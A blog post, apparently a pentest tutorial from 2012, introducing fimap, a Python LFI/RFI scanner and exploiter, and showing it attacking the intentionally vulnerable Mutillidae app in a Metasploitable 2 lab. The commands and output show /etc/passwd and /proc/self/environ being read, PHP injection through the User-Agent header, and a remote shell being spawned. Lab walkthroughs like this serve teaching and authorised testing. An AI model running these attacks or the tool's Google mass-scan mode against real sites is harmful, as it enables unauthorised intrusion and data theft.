Archiwum

Archive for the ‘Python’ Category

FIMAP – LFI/RFI Auditing Tool.

Czerwiec 26, 2012 Dodaj komentarz

FIMAP:

Fimap is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It’s currently under heavy development but it’s usable.

The goal of fimap is to improve the quality and security of your website.

Do not use this tool on servers where you don’t have permission to pentest!

Fimap is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.

How to use:

fimap.py [Options]

[Options]

  •  -h – Help
  •  -u [URL] – URL to scan
  •  -m – Mass scan
  •  -l [filename] – List of URLs for mass scan
  •  -g – Perform Google search to find URLs
  •  -q – Google search query
  •  -H – Harvests a URL recursively for additional URLs to scan
  •  -w [filename] – Write URL list for mass scan
  •  -b – Enables blind testing where errors are not reported by the web application
  •  -x – Exploit vulnerabilities

Output:
Scans target URL(s) for RFI/LFI bugs and, optionally, allows you to exploit any discovered vulnerabilities.

Mutillidae Web App -Metasploitable 2 LFI/RFI Auditing

Mutillidae is a free, open source web application provided to allow security enthusiest to pen-test a web application. NOWASP (Mutillidae) can be installed on Linux, Windows XP, and Windows 7 using XAMMP making it easy for users who do not want to administrate a webserver. It is already installed on Samurai WTF and Rapid7 Metasploitable-2. The existing version can be updated on either. NOWASP (Mutillidae) contains dozens of vulns and hints to help the user; providing an easy-to-use web hacking environment deliberately designed to be used as a lab for security enthusiast, classrooms, labs, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, in corporate web sec training courses, and as an „assess the assessor” target for vulnerability assessment software.


c:\Python25\fimap_alpha_v09>python fimap.py -u "http://192.168.235.129/mutillidae/index.php?page=user-info.php"

c:\Python25\fimap_alpha_v09>python fimap.py -u „http://192.168.235.129/mutillidae/index.php?page=user-info.php”
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

SingleScan is testing URL: ‚http://192.168.235.129/mutillidae/index.php?page=use
r-info.php’
[16:05:56] [OUT] Inspecting URL ‚http://192.168.235.129/mutillidae/index.php?pag
e=user-info.php’…
[16:05:56] [INFO] Fiddling around with URL…
[16:05:56] [OUT] [PHP] Possible file inclusion found! -> ‚http://192.168.235.129
/mutillidae/index.php?page=FmQXBJP2’ with Parameter ‚page’.
[16:05:56] [OUT] [PHP] Identifying Vulnerability ‚http://192.168.235.129/mutilli
dae/index.php?page=user-info.php’ with Parameter ‚page’…
[16:05:56] [INFO] Scriptpath received: ‚/var/www/mutillidae’
[16:05:56] [INFO] Operating System is ‚Unix-Like’.
[16:05:56] [INFO] Testing file ‚/etc/passwd’…
[16:05:57] [INFO] Testing file ‚/proc/self/environ’…
[16:05:57] [INFO] Testing file ‚php://input’…
[16:05:57] [INFO] Testing file ‚/var/log/apache2/access.log’…
[16:05:57] [INFO] Testing file ‚/var/log/apache/access.log’…
[16:05:57] [INFO] Testing file ‚/var/log/httpd/access.log’…
[16:05:58] [INFO] Testing file ‚/var/log/apache2/access_log’…
[16:05:58] [INFO] Testing file ‚/var/log/apache/access_log’…
[16:05:58] [INFO] Testing file ‚/var/log/httpd/access_log’…
[16:05:58] [INFO] Testing file ‚http://www.phpbb.de/index.php’…
###########################################################
#[1] Possible PHP-File Inclusion
#
###########################################################
#::REQUEST
#  [URL]        http://192.168.235.129/mutillidae/index.php?page=user-info.php
#  [HEAD SENT]
#::VULN INFO
#  [GET PARAM]  page
#  [PATH]       /var/www/mutillidae
#  [OS]         Unix
#  [TYPE]       Absolute Clean
#  [TRUNCATION] No Need. It’s clean.
#  [READABLE FILES]
#                   [0] /etc/passwd
#                   [1] /proc/self/environ
########################################################################

This information can be used to further exploit the vulnerable system either manually or with another tool. On the other hand,we can also use fimap’s internal attack features by adding a “-x” parameter to the command line.

c:\Python25\fimap_alpha_v09>python fimap.py -x

c:\Python25\fimap_alpha_v09>python fimap.py -x
fimap v.09 (For the Swarm)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)

###################################################
#:: List of Domains ::                            #
###################################################
#[1] 192.168.235.129                              #
#[ ] And 0 hosts with no valid attack vectors.    #
#[q] Quit                                         #
#######################################################
Choose Domain: 1
#######################################################
#:: FI Bugs on ‚192.168.235.129’ ::
#
######################################################
#[1] URL: ‚/mutillidae/index.php?page=user-info.php’ injecting file: ‚/proc/self
/environ’ using GET-param: ‚page’    #
#[q] Quit

#####################################################
Choose vulnerable script: 1
[16:17:49] [INFO] Testing PHP-code injection thru User-Agent…
[16:17:49] [OUT] PHP Injection works! Testing if execution works…
[16:17:49] [INFO] Testing execution thru ‚popen[b64]’…
[16:17:49] [OUT] Execution thru ‚popen[b64]’ works!
####################################################
#:: Available Attacks – PHP and SHELL access ::    #
####################################################
#[1] Spawn fimap shell                             #
#[2] Spawn pentestmonkey’s reverse shell           #
#[q] Quit                                          #
####################################################
Choose Attack: 1
Please wait – Setting up shell (one request)…
——————————————-
Welcome to fimap shell!
Better don’t start interactive commands! 😉
Also remember that this is not a persistent shell.
Every command opens a new shell and quits it after that!
Enter ‚q’ to exit the shell.
——————————————-
fishell@www-data:/var/www/mutillidae$> who

We can see:

Fimap

Fimap at work